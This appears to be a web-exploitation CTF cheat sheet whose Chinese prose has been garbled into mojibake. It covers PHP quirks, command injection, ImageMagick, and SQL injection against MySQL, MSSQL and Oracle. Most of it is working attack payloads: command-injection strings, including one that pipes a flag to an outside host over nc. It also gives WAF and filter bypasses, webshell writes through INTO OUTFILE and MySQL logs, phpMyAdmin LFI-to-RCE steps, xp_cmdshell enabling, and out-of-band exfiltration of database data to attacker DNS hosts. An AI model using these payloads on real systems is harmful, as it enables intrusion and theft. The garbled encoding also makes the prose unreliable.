- å¯ä»¥ä¸å³
iconv(),iconv_strlen(), php://filterçconvert.iconv
-
- 7.1 - all versions to date
- 7.2 < 7.2.19 (released: 30 May 2019)
- 7.3 < 7.3.6 (released: 30 May 2019)
-
- 7.0 - all versions to date
- 7.1 - all versions to date
- 7.2 - all versions to date
- 7.3 - all versions to date
-
- 7.0 - all versions to date
- 7.1 - all versions to date
- 7.2 - all versions to date
- 7.3 - all versions to date
- 7.4 - all versions to date
-
PHP SplDoublyLinkedList UAF Sandbox Escape
- https://ssd-disclosure.com/ssd-advisory-php-spldoublylinkedlist-uaf-sandbox-escape/
- Affected
- PHP version 8.0 (alpha)
- PHP version 7.4.10 and prior (probably also future versions will be affected)
- Example
-
æç¹ä¸ååè¼......
å ¶ä»
-
大å°å¯«ä¸ææ
<?PhP sYstEm(ls);
-
echo (true ? 'a' : false ? 'b' : 'c');b
-
echo `whoami`;kaibro
-
æ£è¦è¡¨éå¼
.ä¸å¹é æè¡åå %0a -
æ£è¦è¡¨éå¼å¸¸è¦èª¤ç¨:
preg_match("/\\/", $str)- å¹é
åæç·æ該è¦ç¨
\\\\èä¸æ¯\\
-
éç®åªå æ¬åé¡
$a = true && false;$a=>false
$a = true and false;$a=>true
-
chr()
- å¤§æ¼ 256 æ mod 256
- å°æ¼ 0 æå ä¸ 256 çåæ¸ï¼ç´å° >0
- Example:
chr(259) === chr(3)chr(-87) === chr(169)
-
éå¢
$a="9D9"; var_dump(++$a);string(3) "9E0"
$a="9E0"; var_dump(++$a);float(10)
-
ç®æ¸éç®ç¹Filter
%f3%f9%f3%f4%e5%ed & %7f%7f%7f%7f%7f%7fsystem- å¯ç¨å¨éå¶ä¸è½åºç¾è±æ¸åæ or é濾æäºç¹æ®ç¬¦è
$_=('%01'^'`').('%13'^'`').('%13'^'`').('%05'^'`').('%12'^'`').('%14'^'`');assert
- å
¶ä»
~,++çéç®ï¼ä¹é½å¯ç¨é¡ä¼¼æ¦å¿µæ§é
-
è±æ¬è
- é£åãå串å ç´ ååå¯ç¨è±æ¬è
$array{index}å$array[index]
-
filter_var
filter_var('http://evil.com;google.com', FILTER_VALIDATE_URL)- False
filter_var('0://evil.com;google.com', FILTER_VALIDATE_URL)- True
filter_var('"aaaaa{}[]()\'|!#$%*&^-_=+`,."@b.c',FILTER_VALIDATE_EMAIL)"aaaaa{}[]()'|!#$%*&^-_=+,."@b.c` (OK)
filter_var('aaa."bbb"@b.c',FILTER_VALIDATE_EMAIL)aaa."bbb"@b.c(OK)
filter_var('aaa"bbb"@b.c',FILTER_VALIDATE_EMAIL)- False
-
json_decode
- ä¸ç´æ¥åæè¡åå å \t åå
- ä½å¯ä»¥å '\n' å '\t'
- æè½ææè¡åå å Tab
- ä¹å
\uxxxxå½¢å¼json_decode('{"a":"\u0041"}')
-
=== bug
var_dump([0 => 0] === [0x100000000 => 0])- æäºçæ¬ææ¯ True
- ASIS 2018 Qual Nice Code
- https://3v4l.org/sUEMG
-
openssl_verify
- é 測æ¡ç¨ SHA1 ä¾åç°½åï¼å¯è½æ SHA1 Collision åé¡
- e.g. DEFCON CTF 2018 Qual - EasyPisy
-
Namespace
- PHP çé è¨ Global space æ¯
\ - e.g.
\system('ls');
- PHP çé è¨ Global space æ¯
-
basename (php bug 62119)
basename("index.php/config.php/åµ")config.php
- Example: zer0pts CTF 2020 - Can you guess it?
-
strip_tags (php bug 78814)
- php version <= 7.4.0
strip_tags("<s/trong>b</strong>", "<strong>")<s/trong>b</strong>
- Example: zer0pts CTF 2020 - MusicBlog
-
mb_strpos / mb_substr
- ç¶
mb_strposè®å° utf-8 leading byte ï¼ä»æç¹¼çºå試å¾ä¸è®; éå° invalid byte æï¼åé¢çå §å®¹æ被ç¶æä¸å character- Example:
mb_strpos("\xf0\x9fAAA<BB", '<')->4
- Example:
- è
mb_substråæä¸ä¸è´ï¼ç¶éå° leading byte æï¼æè·³é continuation bytes- Example:
mb_substr("\xf0\x9fAAA<BB", 0, 4)->"\xf0\x9fAAA<B"
- Example:
- ref: Joomla XSS
- ç¶
Command Injection
| cat flag
&& cat flag
; cat flag
%0a cat flag
"; cat flag
`cat flag`
cat $(ls)
"; cat $(ls)
`cat flag | nc kaibro.tw 5278`
. flag
PS1=$(cat flag)
`echo${IFS}${PATH}|cut${IFS}-c1-1`
=> /
? and *
?match one charactercat fl?g/???/??t /???/p??s??
*match å¤åcat f*cat f?a*
空ç½ç¹é
${IFS}cat${IFS}flagls$IFS-alhcat$IFS$2flag
cat</etc/passwd{cat,/etc/passwd}X=$'cat\x20/etc/passwd'&&$XIFS=,;`cat<<<uname,-a`- bash only
Keywordç¹é
-
String Concat
A=fl;B=ag;cat $A$B
-
Empty Variable
cat fl${x}agcat tes$(z)t/flag
-
Environment Variable
$PATH => "/usr/local/â¦.blablablaâ${PATH:0:1} => '/'${PATH:1:1} => 'u'${PATH:0:4} => '/usr'
${PS2}>
${PS4}+
-
Empty String
cat fl""agcat fl''agcat "fl""ag"
-
åæç·
c\at fl\ag
ImageMagick
- CVE-2016-3714 (ImageTragick)
mvgæ ¼å¼å å« https èç(ä½¿ç¨ curl ä¸è¼)ï¼å¯ä»¥éåéå¼è- payload:
push graphic-context viewbox 0 0 640 480 fill 'url(https://kaibro.tw";ls "-la)' pop graphic-context - Example
- Google CTF 2019 - GPhotos
Some Debians appear to have insecure ImageMagick configuration by default- read file:
<?xml version="1.0" encoding="UTF-8"?> <svg width="120px" height="120px"> <image width="120" height="120" href="text:/etc/passwd" /> </svg>- copy file (MSL):
<image> <!-- ImageMagick's legend is "image processing" so the tag is named "image". --> <read filename="image.png" /> <!-- To make the legend more compelling "image.png" is checked to be a valid image file. --> <write filename="/var/www/html/shell.php" /> <!-- This line gives access to a hacker accomplishing the mission of the MSL format and ImageMagick in general --> </image> - TokyoWesterns CTF 2018 - Slack emoji converter
- ghostscript RCE
- TokyoWesterns CTF 2019 - Slack emoji converter Kai
- ghostscript RCE
- Google CTF 2019 - GPhotos
Ruby Command Executing
open("| ls")IO.popen("ls").readKernel.exec("ls")Kernel.method("open").call("|ls").read()`ls`system("ls")eval("ruby code")- Non-Alphanumeric example: HITCON CTF 2015 - Hard to say
$$/$$=> 1'' << 97 << 98 << 99=> "abc"$:å³$LOAD_PATH
- Non-Alphanumeric example: HITCON CTF 2015 - Hard to say
exec("ls")%x{ls}/%x'ls'/%x[ls]/%x(ls)/%x;ls;"Process".constantize.spawn("id")Process.spawn("id")PTY.spawn("id")- Net::FTP
- CVE-2017-17405
- use
Kernel#open
Python Command Executing
os.system("ls")os.popen("ls").read()os.execl("/bin/ls","")os.execlp("ls","")os.execv("/bin/ls",[''])os.execvp("/bin/ls",[""])subprocess.call("ls")subprocess.call("ls|cat",shell=False)=> Failsubprocess.call("ls|cat",shell=True)=> Correct
eval("__import__('os').system('ls')")exec("__import__('os').system('ls')")commands.getoutput('ls')
Read File
- diff /etc/passwd /flag
- paste /flag
- bzmore /flag
- bzless /flag
- static-sh /flag
- ...
SQL Injection
MySQL
-
åå串ï¼
substr("abc",1,1) => 'a'mid("abc", 1, 1) => 'a'
-
Ascii function
ascii('A') => 65
-
Char function
char(65) => 'a'
-
Concatenation
CONCAT('a', 'b') => 'ab'- å¦æä»»ä½ä¸æ¬çº NULLï¼åè¿å NULL
CONCAT_WS(åé符, å串1, å串2...)CONCAT_WS('@', 'gg', 'inin')=>gg@inin
-
Cast function
CAST('125e342.83' AS signed) => 125CONVERT('23',SIGNED) => 23
-
Delay function
sleep(5)BENCHMARK(count, expr)
-
空ç½åå
09 0A 0B 0C 0D A0 20
-
File-read function
LOAD_FILE('/etc/passwd')LOAD DATA INFILE- Client è® Server æ件
- ä¸æ¨£å
secure_file_priv,FILEprivilege éå¶ (ref: link)
LOAD DATA LOCAL INFILE-
Server è® Client æ件
-
LOAD DATA LOCAL INFILE '/etc/hosts' INTO TABLE test FIELDS TERMINATED BY "\n"; -
ä¸éè¦
FILEprivilegeï¼ä¸ä»»æç®éæªæ¡çå¯è® (åªè¦ Client ææ¬éå³å¯) -
support UNC Path
LOAD DATA LOCAL INFILE '\\\\172.16.136.153\\test' into table mysql.test FIELDS TERMINATED BY "\n";- stealing net-NTLM hash
-
Trigger phar deserialization
LOAD DATA LOCAL INFILE 'phar://test.phar/test' INTO TABLE a LINES TERMINATED BY '\n'- é default è¨ç½®
[mysqld] local-infile=1 secure_file_priv=""
-
Tool
-
Example
-
- load_file with WebDAV
load_file('//kaibro.tw@9478/meow.php')/load_file('\\\\kaibro.tw@9478/meow.php')- Windows ç°å¢æé WebClient Service æï¼å¯ä»¥éé MySQL load_file + UNC Path ç¼é HTTP Reuqest å°æå® URL (éé
@æå® Port) - 實æ°ä¸ï¼ç«åº«åé¢ç°å¢ï¼è¥å¾ç«¯ MySQL 主æ©æé Web ç°å¢ï¼åå¯éé該æ¹æ³å 寫 webshell åé http request 觸ç¼å·è¡
- Windows ç°å¢æé WebClient Service æï¼å¯ä»¥éé MySQL load_file + UNC Path ç¼é HTTP Reuqest å°æå® URL (éé
- Example
-
File-write
INTO DUMPFILE- é©ç¨ binary (å¯«å ¥åä¸è¡)
INTO OUTFILE- é©ç¨ä¸è¬ææ¬ (ææè¡)
- 寫webshell
- éç¥éå¯å¯«è·¯å¾
UNION SELECT "<? system($_GET[1]);?>",2,3 INTO OUTFILE "/var/www/html/temp/shell.php"
- æ¬é
SELECT file_priv FROM mysql.user
- secure-file-priv
- éå¶ MySQL å°å
¥å°åº
- load_file, into outfile, load data ç
- éè¡æç¡æ³æ´æ¹
- MySQL 5.5.53 åï¼è©²è®æ¸é è¨çºç©º(å¯ä»¥å°å ¥å°åº)
- e.g.
secure_file_priv=E:\- éå¶å°å ¥å°åºåªè½å¨ E:\ ä¸
- e.g.
secure_file_priv=null- éå¶ä¸å 許å°å ¥å°åº
- secure-file-priv éå¶ä¸ç¨ general_log æ¿ shell
SET global general_log='on'; SET global general_log_file='C:/phpStudy/WWW/cmd.php'; SELECT '<?php assert($_POST["cmd"]);?>'; - éå¶ MySQL å°å
¥å°åº
-
IFèªå¥
- IF(condition,true-part,false-part)
SELECT IF (1=1,'true','false')
-
Hex
SELECT X'5061756c'; => paulSELECT 0x5061756c; => paulSELECT 0x5061756c+0 => 1348564332SELECT load_file(0x2F6574632F706173737764);- /etc/passwd
- å¯ç¹éä¸äº WAF
- e.g. ç¨å¨ä¸è½ä½¿ç¨å®å¼èæ(
'=>\') - CHAR() ä¹å¯ä»¥éå°é¡ä¼¼ææ
'admin'=>CHAR(97, 100, 109, 105, 110)
- e.g. ç¨å¨ä¸è½ä½¿ç¨å®å¼èæ(
-
註解ï¼
#--/**/- ä¸å
*/å¯ä»¥éååé¢å¤å/*
- ä¸å
/*! 50001 select * from test */- å¯æ¢æ¸¬çæ¬
- e.g.
SELECT /*!32302 1/0, */ 1 FROM tablename
- `
- MySQL <= 5.5
;- PDO æ¯æ´å¤èªå¥
-
information_schema
- mysql >= 5.0
-
Stacking Query
- é è¨ PHP+MySQL ä¸æ¯æ´ Stacking Query
- ä½ PDO å¯ä»¥ Stacking Query
-
å ¶å®ï¼
- @@version
- å version()
- user()
- current_user
- current_user()
- SESSION_USER()
- SYSTEM_USER()
- current user
- system_user()
- database system user
- database()
- schema()
- current database
- @@basedir
- MySQL å®è£è·¯å¾
- @@datadir
- Location of db file
- @@plugin_dir
- @@hostname
- @@version_compile_os
- Operating System
- @@version_compile_machine
- @@innodb_version
- @@global.secure_file_priv
- MD5()
- SHA1()
- COMPRESS() / UNCOMPRESS()
- group_concat()
- åä½µå¤æ¢çµæ
- e.g.
select group_concat(username) from users;ä¸æ¬¡è¿åææ使ç¨è å
- e.g.
- group_concat_max_len = 1024 (default)
- åä½µå¤æ¢çµæ
- json_arrayagg()
- MySQL >= 5.7.22
- æ¦å¿µåä¸
- e.g.
SELECT json_arrayagg(concat_ws(0x3a,table_schema,table_name)) from INFORMATION_SCHEMA.TABLES
- e.g.
- greatest()
greatest(a, b)è¿å a, b ä¸æ大çgreatest(1, 2)=2- 1
greatest(1, 2)=1- 0
- between a and b
- ä»æ¼ a å° b ä¹é
greatest(1, 2) between 1 and 3- 1
- regexp
SELECT 'abc' regexp '.*'- 1
- Collation
*_cicase insensitive collation ä¸åå大å°å¯«*_cscase sensitive collation åå大å°å¯«*_binbinary case sensitive collation åå大å°å¯«
- @@version
-
Union Based
- å¤æ· column æ¸
union select 1,2,3...Norder by Næ¾æå¾ä¸åæåç N
AND 1=2 UNION SELECT 1, 2, password FROM admin--+LIMIT N, Mè·³éå N çï¼æ M ç- çè³æ庫å
union select 1,2,schema_name from information_schema.schemata limit 1,1
- ç表å
union select 1,2,table_name from information_schema.tables where table_schema='mydb' limit 0,1union select 1,2,table_name from information_schema.columns where table_schema='mydb' limit 0,1
- çColumnå
union select 1,2,column_name from information_schema.columns where table_schema='mydb' limit 0,1
- MySQL User
SELECT CONCAT(user, ":" ,password) FROM mysql.user;
- å¤æ· column æ¸
-
Error Based
- é·åº¦éå¶
- é¯èª¤è¨æ¯æé·åº¦éå¶
#define ERRMSGSIZE (512)
- Overflow
- MySQL > 5.5.5 overflow æææé¯èª¤è¨æ¯
SELECT ~0=>18446744073709551615SELECT ~0 + 1=> ERRORSELECT exp(709)=>8.218407461554972e307SELECT exp(710)=> ERROR- è¥æ¥è©¢æåï¼æè¿å0
SELECT exp(~(SELECT * FROM (SELECT user())x));ERROR 1690(22003):DOUBLE value is out of range in 'exp(~((SELECT 'root@localhost' FROM dual)))'
select (select(!x-~0)from(select(select user())x)a);ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in '((not('root@localhost')) - ~(0))'- MySQL > 5.5.53 ä¸æ顯示æ¥è©¢çµæ
- xpath
- extractvalue (æé·åº¦éå¶ï¼32ä½)
select extractvalue(1,concat(0x7e,(select @@version),0x7e));ERROR 1105 (HY000): XPATH syntax error: '~5.7.17~'
- updatexml (æé·åº¦éå¶ï¼32ä½)
select updatexml(1,concat(0x7e,(select @@version),0x7e),1);ERROR 1105 (HY000): XPATH syntax error: '~5.7.17~'
- extractvalue (æé·åº¦éå¶ï¼32ä½)
- 主éµéè¤
select count(*) from test group by concat(version(),floor(rand(0)*2));ERROR 1062 (23000): Duplicate entry '5.7.171' for key '<group_key>'
- å
¶å®å½æ¸ (5.7)
select ST_LatFromGeoHash(version());select ST_LongFromGeoHash(version());select GTID_SUBSET(version(),1);select GTID_SUBTRACT(version(),1);select ST_PointFromGeoHash(version(),1);
- ç庫åã表åãå段å
- ç¶é濾
information_schemaçééµåæï¼å¯ä»¥ç¨ä¸é¢æ¹æ³ç庫åselect 1,2,3 from users where 1=abc();ERROR 1305 (42000): FUNCTION fl4g.abc does not exist
- ç表å
select 1,2,3 from users where Polygon(id);select 1,2,3 from users where linestring(id);ERROR 1367 (22007): Illegal non geometric '`fl4g`.`users`.`id`' value found during parsing
- çColumn
select 1,2,3 from users where (select * from (select * from users as a join users as b)as c);ERROR 1060 (42S21): Duplicate column name 'id'
select 1,2,3 from users where (select * from (select * from users as a join users as b using(id))as c);ERROR 1060 (42S21): Duplicate column name 'username'
- ç¶é濾
- é·åº¦éå¶
-
Blind Based (Time/Boolean)
- Boolean
- ãæãè·ãæ²æã
id=87 and length(user())>0id=87 and length(user())>100id=87 and ascii(mid(user(),1,1))>100id=87 or ((select user()) regexp binary '^[a-z]')
- Time
- ç¨å¨å¥çµæé½çä¸å°æ
id=87 and if(length(user())>0, sleep(10), 1)=1id=87 and if(length(user())>100, sleep(10), 1)=1id=87 and if(ascii(mid(user(),1,1))>100, sleep(10), 1)=1
- Boolean
-
Out of Bnad
- Windows only
select load_file(concat("\\\\",schema_name,".dns.kaibro.tw/a")) from information_schema.schemata
-
ç¹é空ç½æª¢æ¥
id=-1/**/UNION/**/SELECT/**/1,2,3id=-1%09UNION%0DSELECT%0A1,2,3id=(-1)UNION(SELECT(1),2,3)
-
寬åç¯æ³¨å ¥
addslashes()æè®'è®\'- å¨
GBK編碼ä¸ï¼ä¸æåç¨å ©å Bytes 表示- å ¶ä»å¤åç¯ç·¨ç¢¼ä¹å¯
- ä½è¦ä½ä½ç¯åæå
å«
0x5c(\)
- 第ä¸å Byte è¦ >128 ææ¯ä¸æ
%df'=>%df\'=>é'(æåéé¸)
-
Order byæ³¨å ¥
- å¯ä»¥éé
ascãdescç°¡å®å¤æ·?sort=1 asc?sort=1 desc
- å¾é¢ä¸è½æ¥ UNION
- å·²ç¥å段å (å¯ä»¥ç²æ³¨)
?order=IF(1=1, username, password)
- å©ç¨å ±é¯
?order=IF(1=1,1,(select 1 union select 2))æ£ç¢º?order=IF(1=2,1,(select 1 union select 2))é¯èª¤?order=IF(1=1,1,(select 1 from information_schema.tables))æ£å¸¸?order=IF(1=2,1,(select 1 from information_schema.tables))é¯èª¤
- Time Based
?order=if(1=1,1,(SELECT(1)FROM(SELECT(SLEEP(2)))test))æ£å¸¸?order=if(1=2,1,(SELECT(1)FROM(SELECT(SLEEP(2)))test))sleep 2ç§
- å¯ä»¥éé
-
group by with rollup
' or 1=1 group by pwd with rollup limit 1 offset 2#
-
å°å串è½æç´æ¸å
- å串 -> 16é²ä½ -> 10é²ä½
conv(hex(YOUR_DATA), 16, 10)- éåï¼
unhex(conv(DEC_DATA,10,16)) - é注æä¸è¦ Overflow
-
ä¸ä½¿ç¨éè
LIMIT N, M=>LIMIT M OFFSET Nmid(user(), 1, 1)=>mid(user() from 1 for 1)UNION SELECT 1,2,3=>UNION SELECT * FROM ((SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c)
-
å¿«éæ¥æ¾å¸¶ééµåç表
select table_schema,table_name,column_name from information_schema.columns where table_schema !=0x696E666F726D6174696F6E5F736368656D61 and table_schema !=0x6D7973716C and table_schema !=0x706572666F726D616E63655F736368656D61 and (column_name like '%pass%' or column_name like '%pwd%');
-
ä¸ç¥ååãä¸è½è¨ªå information_schema çæ¸æ
- é ç¥é表å
- ä¾å¦: articeãadmin
select title from article where id = 4 and 0 union SELECT group_concat(a, 0x3a, b) FROM (SELECT 1 a,2 b,3 c UNION SELECT * FROM admin)x- ååä¸å¤ ï¼ç¹¼çºå 4,5,6,7,... ä¸ç´å°çå°åååæ¸
-
innodb
- 表å¼æçº innodb
- MySQL > 5.5
- innodb_table_statsãinnodb_table_indexåæ¾ææ庫å表å
select table_name from mysql.innodb_table_stats where database_name=è³æ庫å;- Example: Codegate2018 prequal - simpleCMS
-
sys
sys.statements_with_full_table_scans- å¯ä»¥æ表å
- è©³è¦ PPP simpleCMS writeup
select query from sys.statements_with_full_table_scans- MySQL 5.7
-
Bypass WAF
select password=>SelEcT password(大å°å¯«)select password=>select/**/password(ç¹ç©ºç½)select password=>s%65lect%20password(URLencode)select password=>select(password)(ç¹ç©ºç½)select password=>select%0apassword(ç¹ç©ºç½)- %09, %0a, %0b, %0c, %0d, %a0
select password from admin=>select password /*!from*/ admin(MySQL註解)information_schema.schemata=>`information_schema`.schemata(ç¹ééµå/空ç½)select xxx from`information_schema`.schemata
select pass from user where id='admin'=>select pass from user where id=0x61646d696e(ç¹å¼è)id=concat(char(0x61),char(0x64),char(0x6d),char(0x69),char(0x6e))
?id=0e2union select 1,2,3(ç§å¸è¨è)?id=1union select 1,2,3æç?id=0e1union(select~1,2,3)(~)?id=.1union select 1,2,3(é»)
WHERE=>HAVING(ç¹ééµå)AND=>&&(ç¹ééµå)OR=>||==>LIKEa = 'b'=>not a > 'b' and not a < 'b'> 10=>not between 0 and 10
LIMIT 0,1=>LIMIT 1 OFFSET 0(ç¹éè)substr('kaibro',1,1)=>substr('kaibro' from 1 for 1)
- Multipart/form-dataç¹é
- å½é User-Agent
- e.g. æäº WAF ä¸å° google bot
-
phpMyAdmin
- 寫æ件 getshell
- æ¢ä»¶
- root æ¬é
- å·²ç¥ web è·¯å¾
- æ寫æªæ¬é
select "<?php phpinfo();?>" INTO OUTFILE "c:\\phpstudy\\www\\shell.php"
- æ¢ä»¶
- general_log getshell
- æ¢ä»¶
- è®å¯«æ¬é
- å·²ç¥ web è·¯å¾
- step1. éåæ¥èª:
set global general_log = "ON"; - step2. æå®æ¥èªæ件:
set global general_log_file = "/var/www/html/shell.php"; - step3. 寫å
¥php:
select "<?php phpinfo();?>";
- æ¢ä»¶
- slow_query getshell
- step1. è¨ç½®æ¥èªè·¯å¾:
set GLOBAL slow_query_log_file='/var/www/html/shell.php'; - step2. éå slow_query_log:
set GLOBAL slow_query_log=on; - step3. 寫å
¥ php:
select '<?php phpinfo();?>' from mysql.db where sleep(10);
- step1. è¨ç½®æ¥èªè·¯å¾:
- CVE-2018-19968
- phpMyAdmin versions: 4.8.0 ~ 4.8.3
- LFI to RCE
- æ¢ä»¶
- è½ç»å ¥å¾å°
- step1.
CREATE DATABASE foo;CREATE TABLE foo.bar (baz VARCHAR(100) PRIMARY KEY );INSERT INTO foo.bar SELECT '<?php phpinfo(); ?>'; - step2.
/chk_rel.php?fixall_pmadb=1&db=foo - step3.
INSERT INTO` pma__column_infoSELECT '1', 'foo', 'bar', 'baz', 'plop','plop', ' plop', 'plop','../../../../../../../../tmp/sess_{SESSIONID}','plop'; - step4.
/tbl_replace.php?db=foo&table=bar&where_clause=1=1&fields_name[multi_edit][][]=baz&clause_is_unique=1
- CVE-2018-12613
- phpMyAdmin versions: 4.8.x
- LFI to RCE
- æ¢ä»¶
- è½ç»å ¥å¾å°
- Payload
index.php?target=db_sql.php%253f/../../../../../../windows/system.iniindex.php?target=sql.php%253f/../../../tmp/tmp/sess_16rme70p2qqnqjnhdiq3i6unu- å¨æ§å¶å°å·è¡ç sql èªå¥æè¢«å¯«å ¥ session
- Session id å¯ä»¥å¾ cookie
phpMyAdminå¾å°
- CVE-2016-5734
- phpmyadmin versions:
- 4.0.10.16 ä¹åç4.0.xçæ¬
- 4.4.15.7 ä¹åç 4.4.xçæ¬
- 4.6.3ä¹åç 4.6.xçæ¬
- php version:
- 4.3.0 ~ 5.4.6
preg_replaceRCE- æ¢ä»¶
- è½ç»å ¥å¾å°
- phpmyadmin versions:
- CVE-2014-8959
- phpMyAdmin version:
- 4.0.1 ~ 4.2.12
- php version:
- < 5.3.4
- æ¢ä»¶
- è½ç»å ¥å¾å°
- è½æªæ·
- Payload:
gis_data_editor.php?token=2941949d3768c57b4342d94ace606e91&gis_data[gis_type]=/../../../../phpinfo.txt%00(éä¿®æ¹token)
- phpMyAdmin version:
- CVE-2013-3238
- versions: 3.5.x < 3.5.8.1 and 4.0.0 < 4.0.0-rc3 ANYUN.ORG
- https://www.exploit-db.com/exploits/25136
- CVE-2012-5159
- versions: v3.5.2.2
- server_sync.php Backdoor
- https://www.exploit-db.com/exploits/21834
- CVE-2009-1151
- versions: 2.11.x < 2.11.9.5 and 3.x < 3.1.3.1
- config/config.inc.php å½ä»¤å·è¡
- https://www.exploit-db.com/exploits/8921
- å¼±å¯ç¢¼ / è¬ç¨å¯ç¢¼
- phpmyadmin 2.11.9.2: root/空å¯ç¢¼
- phpmyadmin 2.11.3 / 2.11.4: ç¨æ¶å:
'localhost'@'@"
- 寫æ件 getshell
MSSQL
-
åå串ï¼
SUBSTRING("abc", 1, 1) => 'a'
-
Ascii function
ascii('A') => 65
-
Char function
char(65) => 'a'
-
Concatenation
+'a'+'b' => 'ab'
-
Delay function
WAITFOR DELAY '0:0:10'
-
空ç½åå
01,02,03,04,05,06,07,08,09,0A,0B,0C,0D,0E,0F,10,11,12,13,14,15,16,17,18,19,1A,1B,1C,1D,1E,1F,20
-
IF èªå¥
- IF condition true-part ELSE false-part
IF (1=1) SELECT 'true' ELSE SELECT 'false'
-
註解ï¼
--/**/
-
TOP
- MSSQL æ²æ
LIMIT N, Mçç¨æ³ SELECT TOP 87 * FROM xxxåæåé¢ 87 ç- å第 78~87 ç
SELECT pass FROM (SELECT pass, ROW_NUMBER() OVER (ORDER BY (SELECT 1)) AS LIMIT FROM mydb.dbo.mytable)x WHERE LIMIT between 78 and 87
- MSSQL æ²æ
-
å ¶å®ï¼
- user
- db_name()
- user_name()
- @@version
- @@language
- @@servername
- host_name()
- has_dbaccess('master')
-
æ¥è©¢ç¨æ¶
select name, loginame from master..syslogins, master..sysprocesses
-
æ¥ç¨æ¶å¯ç¢¼
select user,password from master.dbo.syslogins
-
ç¶åè§è²æ¯å¦çºè³æ庫管çå¡
SELECT is_srvrolemember('sysadmin')
-
ç¶åè§è²æ¯å¦çºdb_owner
SELECT IS_MEMBER('db_owner')
-
çDB name
DB_NAME(N)UNION SELECT NULL,DB_NAME(N),NULL--UNION SELECT NULL,name,NULL FROM master ..sysdatabases--SELECT catalog_name FROM information_schema.schemata1=(select name from master.dbo.sysdatabases where dbid=5)
-
ç表å
SELECT table_catalog, table_name FROM information_schema.tablesSELECT name FROM sysobjects WHERE xtype='U'ID=02';if (select top 1 name from DBname..sysobjects where xtype='U' and name not in ('table1', 'table2'))>0 select 1--
-
çcolumn
SELECT table_catalog, table_name, column_name FROM information_schema.columnsSELECT name FROM syscolumns WHERE id=object_id('news')ID=1337';if (select top 1 col_name(object_id('table_name'), i) from sysobjects)>0 select 1--SELECT name FROM DBNAME..syscolumns WHERE id=(SELECT id FROM DBNAME..sysobjects WHERE name='TABLENAME')
-
ä¸æ¬¡æ§ç²åå ¨é¨è³æ
select quotename(name) from master..sysdatabases FOR XML PATH('')select concat_ws(0x3a,table_schema,table_name,column_name) from information_schema.columns for json auto
-
Union Based
- Column åæ å¿ é ç¸å
- å¯ç¨
NULLä¾é¿å
-
Error Based
- å©ç¨åå¥è½æé¯èª¤
id=1 and user=0
-
Out of Band
declare @p varchar(1024);set @p=(SELECT xxxx);exec('master..xp_dirtree "//'+@p+'.oob.kaibro.tw/a"')fn_xe_file_target_read_file('C:\*.xel','\\'%2b(select+pass+from+users+where+id=1)%2b'.064edw6l0h153w39ricodvyzuq0ood.burpcollaborator.net\1.xem',null,null)- Requires VIEW SERVER STATE permission on the server
fn_get_audit_file('\\'%2b(select+pass+from+users+where+id=1)%2b'.x53bct5ize022t26qfblcsxwtnzhn6.burpcollaborator.net\',default,default)- Requires the CONTROL SERVER permission.
fn_trace_gettable('\\'%2b(select pass from users where id=1)%2b'.oob.kaibro.tw',default)- Requires the CONTROL SERVER permission.
-
å¤æ·æ¯å¦ç«åº«åé¢
- 客æ¶ç«¯ä¸»æ©å:
select host_name(); - æå端主æ©å:
select @@servername; - å ©è ä¸åå³ç«åº«åé¢
- 客æ¶ç«¯ä¸»æ©å:
-
è®æª
select x from OpenRowset(BULK 'C:\Windows\win.ini',SINGLE_CLOB) R(x)
-
xp_cmdshell
- å¨ MSSQL 2000 é»èªéå
- MSSQL 2005 ä¹å¾é»èªéé
- æ sa æ¬éï¼å¯éé sp_configure éåå®
EXEC sp_configure 'show advanced options',1 RECONFIGURE EXEC sp_configure 'xp_cmdshell',1 RECONFIGURE-
å·è¡ command
exec xp_cmdshell 'whoami'
-
ééxp_cmdshell
EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure'xp_cmdshell', 0; RECONFIGURE; -
å¿«éæ¥æ¾å¸¶ééµåç表
SELECT sysobjects.name as tablename, syscolumns.name as columnname FROM sysobjects JOIN syscolumns ON sysobjects.id = syscolumns.id WHERE sysobjects.xtype = 'U' AND (syscolumns.name LIKE '%pass%' or syscolumns.name LIKE '%pwd%' or syscolumns.name LIKE '%first%');
-
ç¹ WAF
- Non-standard whitespace character:
1%C2%85union%C2%85select%C2%A0null,@@version,null--
- æ··æ· UNION
0eunion+select+null,@@version,null--
- Unicode ç¹é
- IIS å° Unicode 編碼æ¯å¯ä»¥è§£æçï¼å³
s%u0065lectæ被解æçº select
- IIS å° Unicode 編碼æ¯å¯ä»¥è§£æçï¼å³
- Non-standard whitespace character:
Oracle
SELECTèªå¥å¿ é å å«FROM- æªæå®ä¾æºï¼å¯ä»¥ç¨
dual表
- æªæå®ä¾æºï¼å¯ä»¥ç¨
- åå串ï¼
SUBSTR('abc', 1, 1) => 'a'
- 空ç½åå
00 0A 0D 0C 09 20
- IFèªå¥
IF condition THEN true-part [ELSE false-part] END IF
- 註解ï¼
--/**/
- ä¸æ¯æ´ limit
- æ¹ç¨ rownum
select table_name from (select rownum no, table_name from all_tables) where no=1
- å®éå¼è
- å®å¼è: string, date
- éå¼è: identifier (table name, column name, ...)
- å
¶å®
SYS.DATABASE_NAME- current database
USER- current user
- or
sys.login_user
SELECT role FROM session_roles- current role
SELECT privilege FROM user_sys_privs- system privileges granted to the current user
SELECT privilege FROM role_sys_privs- privs the current role has
SELECT privilege FROM session_privs- the all privs that current user has = user_sys_privs + role_sys_privs
SELECT banner FROM v$version where rownum=1- database version
SELECT host_name FROM v$instance;- Name of the host machine
SELECT banner FROM v$version WHERE banner LIKE 'TNS%'- ä½æ¥ç³»çµ±çæ¬
utl_inaddr.get_host_address- æ¬æ©IP
select utl_inaddr.get_host_name('87.87.87.87') from dual- IPå解
dba_tables- 系統ææ表è³è¨ï¼éè¦ dba æ¬é
user_tables- ç¶å使ç¨è åä¸è¡¨çè³è¨
- 庫å(schema)
SELECT DISTINCT OWNER FROM ALL_TABLES
- 表å
SELECT OWNER, TABLE_NAME FROM ALL_TABLES
- Column
SELECT OWNER, TABLE_NAME, COLUMN_NAME FROM ALL_TAB_COLUMNS
- Union Based
- Column åæ å¿ é ç¸å
- å¯ç¨
NULLä¾é¿å é¯èª¤ UNION SELECT 1, 'aa', null FROM dual
- Time Based
dbms_pipe.receive_message(('a'),10)SELECT CASE WHEN (CONDITION_HERE) THEN 'a'||dbms_pipe.receive_message(('a'),10) ELSE NULL END FROM dual
- Error Based
